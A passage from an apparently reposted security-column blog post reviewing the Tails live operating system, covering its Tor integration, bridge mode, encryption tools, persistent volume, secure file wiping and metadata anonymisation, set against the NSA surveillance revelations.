conflicted. I believe in protecting the American citizenry above all else. The NSA claims that their surveillance efforts have thwarted attacks against America. Regardless of the debate over the right or wrong of how or if this was achieved, I honor the intent. Yet, while I believe Snowden’s actions are traitorous, as an Internet denizen I can understand his concerns. The problem is that he swore an oath to his country, was well paid to honor it, and then violated it. Regardless of my take on these events and revelations, my obligation to you is to provide you with tooling options. The Information Systems Security Association (ISSA) is an international organization of information security professionals and practitioners. As such, are there means by which our global readership can better practice Internet privacy and security? While there is no panacea, I propose that the likes of The Amnesiac Incognito Live System, or Tails, might contribute to the cause. Again, per the Tails team themselves: “Even though we're doing our best to offer you good tools to protect your privacy while using a computer, there is no magic or perfect solution to such a complex problem.” That said, Tails endeavors to help you preserve your privacy and anonymity. Tails documentation is fabulous; you would do well to start with a full read before using Tails to protect your privacy for the first time. Tails Tails, a merger of the Amnesia and Incognito projects, is a Debian 6 (Squeeze) Linux distribution that works optimally as a live instance via DVD, USB, or SD media. Tails seeks to provide online anonymity and censorship circumvention with the Tor anonymity network to protect your privacy online. All software is configured to connect to the Internet through Tor and if an application tries to connect to the Internet directly, the connection is automatically blocked for security purposes. At this point the well informed amongst you are likely uttering a “whiskey tango foxtrot, Russ, in October The Guardian revealed that the NSA targeted the Tor network.” Yes, true that, but it doesn’t mean that you can’t safely use Tor in a manner that protects you. This is a great opportunity however to direct you to the Tails warning page. Please read this before you do anything else, it’s important. Schneier’s Guardian article also provides nuance. “The fact that all Tor users look alike on the internet, makes it easy to differentiate Tor users from other web users. On the other hand, the anonymity provided by Tor makes it impossible for the NSA to know who the user is, or whether or not the user is in the US.” Getting under way with Tails is easy. Download it, burn it to your preferred media, load the media into your preferred system, and boot it up. I prefer using Tails on USB media inclusive of a persistence volume, just remember to format the USB media in a manner that leaves room to create the persistent volume. When you boot Tails, the first thing you’ll see, as noted in Figure 1 is the Tails Greeter which offers you More Options. Selecting Yes leads you to the option to set an administrative password (recommended) as well as Windows XP Camouflage mode (makes Tails look like Windows XP when you may have shoulder surfers). [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD]FIGURE 1: Tails Greeter[/TD] [/TR] [/TABLE] You can also boot into a virtual machine, but there are some specific drawbacks to this method (the host operating system and the virtualization software can monitor what you are doing in Tails). However Tails will warn you as seen in Figure 2. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD]FIGURE 2: Tails warns regarding a VM and confirms Tor[/TD] [/TR] [/TABLE] Tor You’ll also note in Figure 2 that TorBrowser (built on Iceweasel, a Firefox alternative) is already configured to use Tor, including the Torbutton, as well as NoScript, Cookie Monster, and Adblock Plus add-ons. There is one Tor enhancement to consider that can be added during the boot menu sequence for Tails where you can interrupt the boot sequence with Tab, hit Space, and then add bridge to enable Tor Bridge Mode. According to the Tor Project, bridge relays or bridges for short are Tor relays that aren't listed in the main Tor directory. As such, even if your ISP is filtering connections to all known Tor relays, they probably won't be able to block all bridges. If you suspect access to the Tor network is being blocked, consider use of the Tor bridge feature as supported fully by Tails when booting in bridge mode. Control Tor with Vidalia which is available via the onion icon the notification area found in the upper right area of the Tails UI. One last note on Tor use as already described on the Tails Warning page you should have already read. Your Tor use is only as good as your exit node. Remember, “Tor is about hiding your location, not about encrypting your communication.” Tor does not, and cannot, encrypt the traffic between an exit node and the destination server. Therefore, any Tor exit node is in a position to capture any traffic passing through it and you should thus use end-to-end encryption for all communications. Be aware that Tails also offers I2P as an alternative to Tor. Encryption Options and Features HTTPS Everywhere is already configured for you in Tor Browser. HTTPS Everywhere uses a ruleset with regular expressions to rewrite URLs to HTTPS. Certain sites offer limited or partial support for encryption over HTTPS, but make it difficult to use where they may default to unencrypted HTTP, or provide hyperlinks on encrypted pages that point back to the unencrypted site. You can use Pidgin for instant messaging which includes OTR or off-the-record encryption. Each time you start Tails you can count on it to generate a random username for all Pidgin accounts. If you’re afraid the computer you’ve booted Tails on (a system in an Internet café or library) is not trustworthy due to the like of a hardware keylogger, you can use the Florence virtual keyboard, also found in the notification area as seen in Figure 3. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD]FIGURE 3: The Tails virtual keyboard[/TD] [/TR] [/TABLE] If you’re going to create a persistent volume (recommended) when you use Tails from USB media, do so easily with Applications | Tails | Configure persistent volume. Reboot, then be sure to enable persistence with the Tails Greeter. You will need to setup the USB stick to leave unused space for a persistent volume. You can securely wipe files and cleanup available space thereafter with Nautilus Wipe. Just right click a file or files in the Nautilus file manager and select Wipe to blow it away…forever…in perpetuity. KeePassX is available to securely manage passwords and store them on your persistent volume. You can also configure all your keyrings (GPG, Gnome, Pidgin) as well as Claws Mail. Remember, the persistent volume is encrypted upon creation. You can encrypt text with a passphrase, encrypt and sign text with a public key, and decrypt and verify text with the Tails gpgApplet (the clipboard in the notification area). One last cool Tails feature that doesn’t garner much attention is the Metadata Anonymisation app. This is not unlike Informatica 64’s OOMetaExtractor, the same folks who bring you FOCA as described in the March 2011 toolsmith. Metadata Anonymisation is found under Applications then Accessories. This application will strip all of those interesting file properties left in metadata such as author names and date of creation or change. I have used my share of metadata to create a target list for social engineering during penetration tests so it’s definitely a good idea to clean docs if you’re going to publish or share them if you wish to remain anonymous. Figure 4 shows a before and after collage of PowerPoint metadata for a recent presentation I gave. There are numerous opportunities to protect yourself using The Amnesiac Incognito Live System and I strongly advocate for you keeping an instance at the ready should you need it. It’s ideal for those of you who travel to hostile computing environments, as well as for those of you non-US readers who may not benefit from the same level of personal freedoms and protection from censorship that we typically enjoy here in the States (tongue somewhat in cheek given current events described herein). Conclusion Aside from hoping you’ll give Tails a good look and make use of it, I’d like to leave you with two related resources well worth your attention. The first is a 2007 presentation from Dan Shumow and Niels Ferguson of Microsoft titled On the Possibility of a Back Door in the NIST SP800-90 Dual Ec Prng. Yep, the same random number generator as described in the introduction to this column. The second resource is from bettercrypto.org and is called Applied Crypto Hardening. Systems administrators should definitely give this one a read. Enjoy your efforts to shield yourself from watchful eyes and ears and let me know what you think of Tails. Ping me via Twitter via @holisticinfosec or email if you have questions (russ at holisticinfosec dot org). Cheers…until next month. Posted by Russ McRee at 9:58 AM Sursa: HolisticInfoSec: toolsmith: Tails - The Amnesiac Incognito Live System